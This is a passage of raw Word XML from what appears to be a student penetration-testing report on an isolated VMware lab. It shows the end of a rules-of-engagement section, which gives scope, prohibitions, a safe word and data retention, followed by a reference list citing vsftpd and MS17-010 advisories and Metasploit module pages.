          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Operation was performed under a pre-negotiated Rules of Engagement (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>RoE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>) tool signed between the Red Team operator and the ABCD Ltd. attacking only the team of virtual machines in the isolated laboratory, which were listed in Section 2. The work was done within the frames of the Computer Misuse Act 1990 (UK), and a clear written consent of the assigned engagement sponsor (ABCD Ltd) in the UK [16].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DD33F9" w14:textId="77777777" w:rsidR="0096522D" w:rsidRPr="00C668B5" w:rsidRDefault="0096522D" w:rsidP="0096522D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>In-scope targets: 192.168.174.130, 192.168.174.135, 192.168.174.136 exclusively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791F974B" w14:textId="77777777" w:rsidR="0096522D" w:rsidRPr="00C668B5" w:rsidRDefault="0096522D" w:rsidP="0096522D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Only VM targets that were confined to a host-only VMware network; none had connectivity to the production or internet facing infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F853B99" w14:textId="77777777" w:rsidR="0096522D" w:rsidRPr="00C668B5" w:rsidRDefault="0096522D" w:rsidP="0096522D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Denial-of-service attacks, destructive code and long-lasting firmware rootkits expressly forbidden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B1C278" w14:textId="1FDE5590" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="0096522D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Safe-word protocol: CRIMSON HALT — immediate cessation of all activity upon receipt; system state preserved pending sponsor authorization to resume.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187323C8" w14:textId="39B12285" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="0096522D" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Artifacts of all engagements (logs, screenshots, hash values, etc.) will be safely destroyed 30 days after the acceptance of the report, which is in compliance with the UK GDPR Article 5(1)(e) storage limitation principle [17].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1430756B" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="22154178" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00EA4F2C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>8. References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247D69E5" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00E320E7" w:rsidRDefault="00E32FA2" w:rsidP="00E320E7">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E320E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[1] MITRE Corporation, "MITRE ATT&amp;CK Enterprise Matrix, Version 14," MITRE ATT&amp;CK, 2023. [Online]. Available: https://attack.mitre.org. [Accessed: Mar. 2025].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A542CBC" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00E320E7" w:rsidRDefault="00E32FA2" w:rsidP="00E320E7">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E320E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[2] P. Engebretson, The Basics of Hacking and Penetration Testing, 2nd ed. Waltham, MA: Syngress, 2013.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A45317F" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00E320E7" w:rsidRDefault="00E32FA2" w:rsidP="00E320E7">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E320E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[3] VMware Inc., "VMware Workstation Pro User Guide," VMware Documentation, ver. 17.0, 2024. [Online]. Available: https://docs.vmware.com/en/VMware-Workstation-Pro. [Accessed: Mar. 2025].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8878BB" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00E320E7" w:rsidRDefault="00E32FA2" w:rsidP="00E320E7">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E320E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[4] G. Weidman, Penetration Testing: A Hands-On Introduction to Hacking. San Francisco, CA: No Starch Press, 2014.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8C5C1F" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00E320E7" w:rsidRDefault="00E32FA2" w:rsidP="00E320E7">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E320E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[5] FireEye Mandiant, "APT41: A Dual Espionage and Cyber Crime Operation," Mandiant Threat Intelligence, 2019. [Online]. Available: https://www.mandiant.com/resources/apt41-dual-espionage-and-cyber-crime-operation. [Accessed: Mar. 2025].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB70852" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00E320E7" w:rsidRDefault="00E32FA2" w:rsidP="00E320E7">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E320E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[6] National Vulnerability Database, "CVE-2011-2523 Detail — vsftpd 2.3.4 Backdoor Command Execution," NIST NVD, 2011. [Online]. Available: https://nvd.nist.gov/vuln/detail/CVE-2011-2523. [Accessed: Mar. 2025].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C723AE" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00E320E7" w:rsidRDefault="00E32FA2" w:rsidP="00E320E7">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E320E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[7] Rapid7, "Metasploit Framework: exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E320E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E320E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/ftp/vsftpd_234_backdoor," Metasploit Module Documentation, 2024. [Online]. Available: https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor. [Accessed: Mar. 2025].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B0A7A6" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00E320E7" w:rsidRDefault="00E32FA2" w:rsidP="00E320E7">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E320E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[8] T. Wilhelm, Professional Penetration Testing: Creating and Learning in a Hacking Lab, 2nd ed. Waltham, MA: Syngress, 2013.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621C522F" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00E320E7" w:rsidRDefault="00E32FA2" w:rsidP="00E320E7">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E320E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[9] Microsoft Corporation, "Microsoft Security Bulletin MS17-010 — Critical: SMB Server Vulnerability," Microsoft Security Response Center, Mar. 2017. [Online]. Available: https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010. [Accessed: Mar. 2025].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7389CED4" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00E320E7" w:rsidRDefault="00E32FA2" w:rsidP="00E320E7">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E320E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[10] Rapid7, "Metasploit Framework: exploit/windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E320E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E320E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/ms17_010_eternalblue," Metasploit Module Documentation, 2024. [Online]. Available: https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue. [Accessed: Mar. 2025].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D0A197" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00E320E7" w:rsidRDefault="00E32FA2" w:rsidP="00E320E7">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E320E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[11] Microsoft Corporation, "Credential Guard Overview," Microsoft Security Documentation, 2024. [Online]. Available: https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard. [Accessed: Mar. 2025].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D3DA06" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00E320E7" w:rsidRDefault="00E32FA2" w:rsidP="00E320E7">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E320E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[12] N. Bhatt, "Remote Desktop Protocol (RDP) Security Best Practices," SANS Institute Reading Room, 2020. [Online]. Available: https://www.sans.org/reading-room. [Accessed: Mar. 2025].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485FEC8C" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00E320E7" w:rsidRDefault="00E32FA2" w:rsidP="00E320E7">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E320E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[13] R. Beggs, Mastering Kali Linux for Advanced Penetration Testing, 4th ed. Birmingham, UK: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E320E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Packt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E320E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Publishing, 2022.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2302A4EE" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00E320E7" w:rsidRDefault="00E32FA2" w:rsidP="00E320E7">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E320E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[14] CISA, "Endpoint Detection and Response Recommendations," Cybersecurity and Infrastructure Security Agency, Advisory AA22-011A, Jan. 2022. [Online]. Available: https://www.cisa.gov. [Accessed: Mar. 2025].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377E11C8" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00E320E7" w:rsidRDefault="00E32FA2" w:rsidP="00E320E7">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E320E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[15] National Cyber Security Centre, "Cyber Essentials: Requirements for IT Infrastructure," NCSC, ver. 3.1, London, UK, 2023. [Online]. Available: https://www.ncsc.gov.uk/cyberessentials. [Accessed: Mar. 2025].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7CFEE5" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00E320E7" w:rsidRDefault="00E32FA2" w:rsidP="00E320E7">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E320E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[16] UK Government, "Computer Misuse Act 1990," legislation.gov.uk, 1990. [Online]. Available: https://www.legislation.gov.uk/ukpga/1990/18. [Accessed: Mar. 2025].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284B7DD8" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00E320E7" w:rsidRDefault="00E32FA2" w:rsidP="00E320E7">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E320E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>[17] UK Information Commissioner's Office, "UK General Data Protection Regulation (UK GDPR) — Article 5: Principles," ICO, 2021. [Online]. Available: https://ico.org.uk/for-organisations/uk-gdpr-guidance. [Accessed: Mar. 2025].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73279B9C" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CC784DF" w14:textId="77777777" w:rsidR="00CD1657" w:rsidRPr="00C668B5" w:rsidRDefault="00CD1657" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00CD1657" w:rsidRPr="00C668B5" w:rsidSect="00A26792">
      <w:headerReference w:type="default" r:id="rId22"/>
      <w:footerReference w:type="default" r:id="rId23"/>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="794"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EAF26A5" w14:textId="77777777" w:rsidR="00067250" w:rsidRDefault="00067250" w:rsidP="00667584">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7B3912B5" w14:textId="77777777" w:rsidR="00067250" w:rsidRDefault="00067250" w:rsidP="006675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5109106"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w14:paraId="0621884F" w14:textId="20976122" w:rsidR="00A26792" w:rsidRDefault="00A26792">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5B3F1BA5" w14:textId="77777777" w:rsidR="00A26792" w:rsidRDefault="00A2679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3E0834" w14:textId="77777777" w:rsidR="00067250" w:rsidRDefault="00067250" w:rsidP="00667584">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4824500F" w14:textId="77777777" w:rsidR="00067250" w:rsidRDefault="00067250" w:rsidP="006675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55BD8B7" w14:textId="58E2F85F" w:rsidR="00A26792" w:rsidRDefault="00A26792">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:t>Raj Bhatia</w:t>
    </w:r>
    <w:r>
      <w:tab/>
    </w:r>
    <w:r>
      <w:tab/>
      <w:t>2522682</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91A73"/>
    <w:rsid w:val="00067250"/>
    <w:rsid w:val="00096218"/>
    <w:rsid w:val="000A5A76"/>
    <w:rsid w:val="000B2DA7"/>
    <w:rsid w:val="000D0F11"/>
    <w:rsid w:val="00117229"/>
    <w:rsid w:val="001348C2"/>
    <w:rsid w:val="00195D48"/>
    <w:rsid w:val="00196B7E"/>
    <w:rsid w:val="001A1641"/>
    <w:rsid w:val="00246541"/>
    <w:rsid w:val="002B14B2"/>
    <w:rsid w:val="00304D0A"/>
    <w:rsid w:val="003B4D01"/>
    <w:rsid w:val="003D6165"/>
    <w:rsid w:val="003E04A6"/>
    <w:rsid w:val="00415F2D"/>
    <w:rsid w:val="00432F05"/>
    <w:rsid w:val="00453791"/>
    <w:rsid w:val="00471EC2"/>
    <w:rsid w:val="00485A75"/>
    <w:rsid w:val="0051437F"/>
    <w:rsid w:val="00523FC3"/>
    <w:rsid w:val="00534FB1"/>
    <w:rsid w:val="00551A2E"/>
    <w:rsid w:val="00554799"/>
    <w:rsid w:val="006037A5"/>
    <w:rsid w:val="006068B9"/>
    <w:rsid w:val="006506B9"/>
    <w:rsid w:val="00667584"/>
    <w:rsid w:val="0068222C"/>
    <w:rsid w:val="006B16F3"/>
    <w:rsid w:val="006D5E64"/>
    <w:rsid w:val="0071136F"/>
    <w:rsid w:val="0072251C"/>
    <w:rsid w:val="007B2889"/>
    <w:rsid w:val="007C39FD"/>
    <w:rsid w:val="007D1079"/>
    <w:rsid w:val="007D3C7A"/>
    <w:rsid w:val="00881420"/>
    <w:rsid w:val="00882875"/>
    <w:rsid w:val="008A59C4"/>
    <w:rsid w:val="008B33C7"/>
    <w:rsid w:val="0090018C"/>
    <w:rsid w:val="0096304D"/>
    <w:rsid w:val="0096522D"/>
    <w:rsid w:val="0097244F"/>
    <w:rsid w:val="00981BC9"/>
    <w:rsid w:val="00991A73"/>
    <w:rsid w:val="009F4FC9"/>
    <w:rsid w:val="00A26792"/>
    <w:rsid w:val="00AB48FC"/>
    <w:rsid w:val="00AB6328"/>
    <w:rsid w:val="00AD32BF"/>
    <w:rsid w:val="00B33629"/>
    <w:rsid w:val="00B44F1E"/>
    <w:rsid w:val="00B76B63"/>
    <w:rsid w:val="00BA6ED1"/>
    <w:rsid w:val="00C668B5"/>
    <w:rsid w:val="00CB5DDA"/>
    <w:rsid w:val="00CD1657"/>
    <w:rsid w:val="00D22F4D"/>
    <w:rsid w:val="00D728AD"/>
    <w:rsid w:val="00DA7BD0"/>
    <w:rsid w:val="00DE5D93"/>
    <w:rsid w:val="00E320E7"/>
    <w:rsid w:val="00E32FA2"/>
    <w:rsid w:val="00E86423"/>
    <w:rsid w:val="00EA4F2C"/>
    <w:rsid w:val="00EB5A9D"/>
    <w:rsid w:val="00F016B3"/>
    <w:rsid w:val="00FB20AD"/>
    <w:rsid w:val="00FB5A2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DB14E6"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B5EAED4A-5007-40AD-B06B-FB5E31E76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96B7E"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00991A7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991A7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991A7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91A7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91A7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91A7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91A7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91A7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91A7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91A7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991A7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991A7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91A7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991A7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991A7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991A7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991A7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991A73"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00991A7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91A7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91A7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91A7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991A73"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00991A73"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00991A73"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00991A73"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00991A7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991A73"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00991A73"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="GridTable1Light">
    <w:name w:val="Grid Table 1 Light"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="46"/>
    <w:rsid w:val="00667584"/>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PlainTable5">
    <w:name w:val="Plain Table 5"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="45"/>
    <w:rsid w:val="00667584"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
        <w:i/>
        <w:iCs/>
        <w:sz w:val="26"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
        <w:i/>
        <w:iCs/>
        <w:sz w:val="26"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
        <w:i/>
        <w:iCs/>
        <w:sz w:val="26"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
